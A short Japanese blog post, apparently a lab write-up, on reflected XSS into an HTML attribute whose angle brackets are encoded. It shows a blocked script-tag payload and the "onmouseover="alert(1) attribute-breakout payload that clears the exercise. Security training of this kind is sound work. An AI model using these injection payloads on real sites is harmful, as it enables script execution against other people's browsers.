Hello there, ('ω')ノ

 

HTMLでエンコードされた<>属性に反映XSSを。

まずは、一般的なペイロードを。

入力したペイロードそのものが表示されて。

　<script>alert(1)</script>

 

リクエストを確認することに。

 

 

レスポンスを確認すると下記のようにエスケープ処理されいて。

　&lt;script&gt;alert(1)&lt;/script&gt;

 

 

というわけで<>属性を使用せずに実行する手段を入力するとクリアできた。

　"onmouseover="alert(1)

 

 

ちなみに今回のペイロードのレスポンスを確認すると以下のとおりで。

　&quot;onmouseover=&quot;alert(1)

 

 

Best regards, (^^ゞ